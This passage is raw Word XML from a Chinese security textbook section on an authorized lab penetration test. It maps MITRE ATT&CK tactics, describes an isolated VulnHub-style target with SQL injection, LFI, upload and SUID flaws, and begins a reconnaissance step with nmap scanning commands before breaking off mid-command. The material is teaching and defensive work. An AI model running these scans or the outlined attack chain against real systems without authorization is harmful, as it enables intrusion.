      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架中的战术（Tactics）来组织步骤：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">侦察（Reconnaissance）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">资源开发（Resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Development）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">初始访问（Initial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Access）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">执行（Execution）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">持久化（Persistence）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">权限提升（Privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Escalation）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御规避（Defense</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evasion，仅概念提及）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">凭据访问（Credential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Access）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">发现（Discovery）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">横向移动（Lateral</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Movement）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">收集（Collection）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令与控制（Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Control）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">渗出（Exfiltration）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">影响（Impact）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。在授权靶机环境中，我们关注其中最关键的技术链路：侦察→Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">突破→getshell→提权→后渗透。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御者视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：蓝队工程师需要理解攻击者的完整操作流程，才能在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SOC（Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Operations </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Center，安全运营中心）中正确配置检测规则、关联告警、追溯攻击链。本节每给出一条攻击命令，就立刻给出对应的防御措施——这是检测工程（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）和安全加固（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）内容的实战化兑现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">三态标注说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本节每个技术事实结尾均标注①（标准/通用原理）②（环境/版本相关）③（简化/概念示意）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="387"/>
    <w:bookmarkStart w:id="388" w:name="目标靶机与环境"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目标靶机与环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：一台运行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ubuntu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用服务器，开放</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP（80/tcp）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH（22/tcp）。Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用存在以下漏洞（典型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中等难度靶机配置）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一个存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入的登录表单；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一个存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI（Local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> File </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Inclusion，本地文件包含）的参数；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一个存在文件上传漏洞的“个人头像”功能，对文件类型过滤不严；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统存在一个可被低权限用户利用的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权二进制文件。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所有这些漏洞均为教学目的在隔离环境中故意部署。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">宿主机：Kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux（最新稳定版，2024.x），IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;KALI_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机：VulnHub/自定义靶机，IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络模式：Host-Only，确保与外部网络隔离。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：下文所有命令中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;KALI_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;PORT&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;USERNAME&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;HASH&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等均为占位符，实际值因靶机而异②。不编造任何</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP、端口、用户名、哈希或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="388"/>
    <w:bookmarkStart w:id="389" w:name="步骤一侦察reconnaissance-nmap-扫描与服务枚举"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤一：侦察（Reconnaissance）——</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描与服务枚举</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理回指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描、服务版本探测、NSE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本引擎原理已见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章；端口状态（open/closed/filtered）与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三次握手的关系已见《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在不接触目标应用层的情况下，获得目标开放的端口、运行的服务及其版本信息——这是后续攻击步骤的决策基础。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实操命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">终端执行）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. 主机发现（确认靶机在线）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/24 ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. 全端口快速 SYN 扫描</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-p-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--min-rate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1000 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-oA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap_full </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. 对开放端口进行深入的服务版本和默认脚本扫描</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
